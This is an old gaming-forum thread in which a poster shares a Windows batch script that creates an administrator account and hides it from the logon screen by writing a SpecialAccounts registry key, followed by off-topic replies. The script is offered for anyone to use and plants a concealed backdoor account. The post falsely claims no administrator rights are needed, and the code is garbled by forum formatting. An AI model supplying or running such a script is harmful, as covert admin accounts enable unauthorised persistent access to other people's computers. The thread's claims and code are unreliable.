News:

Keep our threads alive by bumping them often here and here

Main Menu

Jeremy's How-To Thread

Started by Jeremy, September 08, 2008, 11:37:47 PM

Previous topic - Next topic

Jeremy

Hey Worldscaper's!

I will try to add as many different cmd guides as I can. I have some free time, so i'll bring to you the first of many to come. This guide will show you how to create a .bat file that uses the command prompt to create an administrator account on any Windows computer. No, you don't have to be an administrator to use this! :)

This has a 95% chance of working - all depending on your computer settings.

Estimated time of completion: 10 minutes.

The Admin Account Creator: By Jeremy Ritter.

Step 1: Right click desktop -> new -> Text Document.

Step 2: Copy paste this EXACTLY into the Text Document.

@ECHO off
TITLE Admin Account Creator MS-DOS Script written by Jeremy Ritter
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO   [INFO]
ECHO   [-] Create a hidden ADMINISTRATOR Account. App. process executed via MS-DOS Scripting. (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo     \
GOTO %AC_PART%

:001
SET /P AC_NAME=
  • Administrator Account name you wish to create? :
    cls
    SET AC_PART=002
    GOTO HEADER


    :002
    SET /P AC_PASS=
  • Administrator Account password you wish to assign? :
    cls
    SET AC_PART=003
    GOTO HEADER

    :003
    SET /P AC_COMMENT=
  • Account Comment? (Type "y" and press enter)? :
    cls
    SET AC_PART=004
    GOTO HEADER


    :004
    ECHO     [* The following groups are available on the machine Ext.(MS)=Administrator.
    ECHO.
    net localgroup | find "*"
    ECHO.
    SET /P AC_GROUP=
  • Group? :
    cls
    SET AC_PART=005
    GOTO HEADER


    :005
    SET /P AC_OK=
  • Administrator account is being created now, continue and finalize? (y/n) :
    IF NOT %AC_OK%==y GOTO 0051
    net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
    net localgroup "%AC_GROUP%" %AC_NAME% /add
    ECHO.
    pause

    :0051
    cls
    SET AC_PART=006
    GOTO HEADER


    :006
    SET /P AC_HIDE=
  • Do you want to hide this  the account from the XP logon screen? (y/n) :
    IF NOT %AC_HIDE%==y GOTO END
    echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

    NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg
    echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg
    Regedit /s %TEMP%\addregistry.reg
    Del %TEMP%\addregistry.reg
    :END
    ECHO.
    pause

    ------- DO NOT COPY ANY FURTHER

    Step 3: Click "save as" and type: Admin Creator.bat.  (**Important: You have to save it as .bat, or it won't work! :))

    Step 4: Right click the .bat app you just saved to your desktop (Admin Creator) and click "Create Shortcut". That will create an identicle application. Click the one you created.

    Step 5: Simply follow the prompt within the Command Prompt, and ta-da!

    If you have any questions please post and I will answer them.

    Have a wonderful day,  ;D  ;D  ;D

    Jeremy.



I'm bad enough to commit suicide and survive long enough to kill my soul after I'm dead.
-Picture removed-

BigDogg420

sick ill do it maby tonight  8)WAZ UP JER DUDE BRING THE USB THING TOMORROW


You say Akon - I say Suicide Silence
You say 50 Cent - I say The Devil Wears Prada >>>>>> (BEST BAND EVER)
You say Jonas Brothers - I say August Burns Red
You say Miley Cyrus - I say As I Lay Dying
You say rap - I say rock
You say pop - I say hardcore
You say hip hop- I scream metalcore
92% of the teenage population has turned to rap, pop, and hip-hop. If you are one of the 8% who like to head-bang and disturb the peace then put this in your signature!

Chaoslancex







maddy

omg to many words jer jer try to keep the words low lol. :O *wink wink*
lolz a little weird I know. :)

Banjo Hick

#4
if u have so much free time then maybe u could quiz me for the recovery of the pass of this account??? but what u were talking about was really cool. but unfortunatly i dont have the attention span to keep reading all of it sorzy

    ~nitti~

Banjo Hick

oh wait sorry this is from when u had lots of free time in september not november. oops.

    ~nitti~

pure skilla3

Quote from: banjo hick on November 08, 2008, 02:11:29 PM
oh wait sorry this is from when u had lots of free time in september not november. oops.

    ~nitti~
wow banjo are you acount sharing again?you make it so obvious ~nitti~?
i thought you were banjo..

     ^^thats my rs acount up there^^
url=http://www.draynor.net/][/url]
^^also my rs acount --'s arent ranked^^

^^now thats my ws acount

Bill

Quote from: pure skilla3 on May 29, 2009, 11:50:31 PM
Quote from: banjo hick on November 08, 2008, 02:11:29 PM
oh wait sorry this is from when u had lots of free time in september not november. oops.

    ~nitti~
wow banjo are you acount sharing again?you make it so obvious ~nitti~?
i thought you were banjo..

Dude, he posted that on November 8, 2008.


Quote from: Bill on August 23, 2010, 07:55:43 PM
Quote from: Ry60003333 on August 22, 2010, 05:40:15 AM
Thanks! It feels great to finally get it up after all these years. 8)
Lmfao.........

Banjo Hick

yeah i dont even pull up posts that old, i did recover the account though, and no i am not, thats my old signature, that word means something to me, it means absolutely nothing to u, so dont worry about it, and im oretty sure im not that off topic too

Thrasherx121

I get as far as the Group. What do I do with the Hide? What am I supposed to type in for it?